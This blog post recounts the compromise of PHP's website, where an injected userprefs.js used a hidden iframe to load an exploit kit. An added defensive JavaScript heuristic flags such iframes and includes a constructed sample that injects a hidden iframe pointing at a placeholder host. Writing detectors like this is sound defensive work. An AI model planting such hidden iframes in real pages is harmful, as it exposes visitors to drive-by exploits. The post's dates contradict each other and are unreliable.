
Overview of Hacking Case

Posted on: March 25, 2013 at 02:00 AM

Most security/technology guys are probably aware by now that PHP’s website was compromised and injected with JavaScript malware this week. The malware was originally detected by Google Safe Browsing. On Thursday 24 Oct 2013, Google began to warn that the site contains malware. This post describes the case at a high level and refers to other articles which provide further details.

“False positive” debate

Once Google had flagged the site as suspicious, there was some debate about whether the alert was a false positive or not. At first there was a strong rumor that the alert was actually a false positive. Some links to the early debate:

However, eventually it was confirmed that the suspicion was correct. Later PHP itself explained that a malicious version of the file userprefs.js was served and hosted by the server during certain time periods. For most of the time the file seemed (and was) legit, which was the reason for the “false positive” debate.


A couple of sources have reviewed and analyzed the malicious code. It turned out that the JavaScript code created a hidden iframe, which loaded a third-party website containing an exploit kit. The exploit kit tried to exploit vulnerabilities in Java, Flash and Silverlight implementations. Details available at the following links:

According to Kaspersky’s researcher, the iframe pointed to a website hosting the Magnitude Exploit Kit, which in turn tries to exploit CVE-2013-2551.
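The hidden-iframe behaviour described above can be screened for statically when reviewing a served script. The following is an added example, not code from the original post or from PHP; the function names, the placeholder hosts `site.example` and `kit.example.invalid`, and both sample scripts are constructed for illustration.

```javascript
// Heuristic: flag a script that creates an iframe, hides it, and points off-site.
const CREATES_IFRAME = /createElement\(\s*['"]iframe['"]\s*\)|<iframe\b/i;
const HIDING_HINTS = [
  /\b(?:width|height)\s*[=:]\s*['"]?\s*[01](?:px)?\b/i, // 0 or 1 pixel frame
  /display\s*[=:]\s*['"]?\s*none/i,
  /visibility\s*[=:]\s*['"]?\s*hidden/i,
  /(?:left|top)\s*[=:]\s*['"]?\s*-\d{3,}/i,             // pushed off screen
];
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Hosts referenced by the script that are not the site itself or a subdomain.
function offSiteHosts(source, firstPartyHost) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) {
    const host = m[1].toLowerCase();
    const sameSite = host === firstPartyHost || host.endsWith('.' + firstPartyHost);
    if (!sameSite) hosts.add(host);
  }
  return [...hosts];
}

function inspectScript(source, firstPartyHost) {
  const createsIframe = CREATES_IFRAME.test(source);
  const hidden = HIDING_HINTS.some((re) => re.test(source));
  const externalHosts = offSiteHosts(source, firstPartyHost);
  const suspicious = createsIframe && hidden && externalHosts.length > 0;
  return { createsIframe, hidden, externalHosts, suspicious };
}

// Constructed sample: an ordinary preferences helper.
const BENIGN = `
function savePrefs(name, value) {
  document.cookie = name + '=' + encodeURIComponent(value) + '; path=/';
}`;

// Constructed sample: the same file with an injected hidden iframe appended.
const INJECTED = BENIGN + `
(function () {
  var f = document.createElement('iframe');
  f.src = 'http://kit.example.invalid/landing';
  f.width = 1; f.height = 1;
  f.style.visibility = 'hidden';
  document.body.appendChild(f);
})();`;

console.log(inspectScript(BENIGN, 'site.example'));
console.log(inspectScript(INJECTED, 'site.example'));
```

A string-level heuristic like this misses obfuscated payloads, so it works best alongside a hash baseline of the served file, which catches any change to its contents.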


Later PHP confirmed that two servers were compromised and SSL private keys may have been stolen as well. Thus, SSL certificates were revoked. It is still unknown how the attackers were able to compromise the servers.

What we learnt from this story, from a normal user’s point of view: keep your software up to date and disable unnecessary plugins. Once again, it was just normal malware that the site was serving, trying to exploit known and patched vulnerabilities. Hence, if everyone just kept their systems up to date, no harm would have been done to the end users.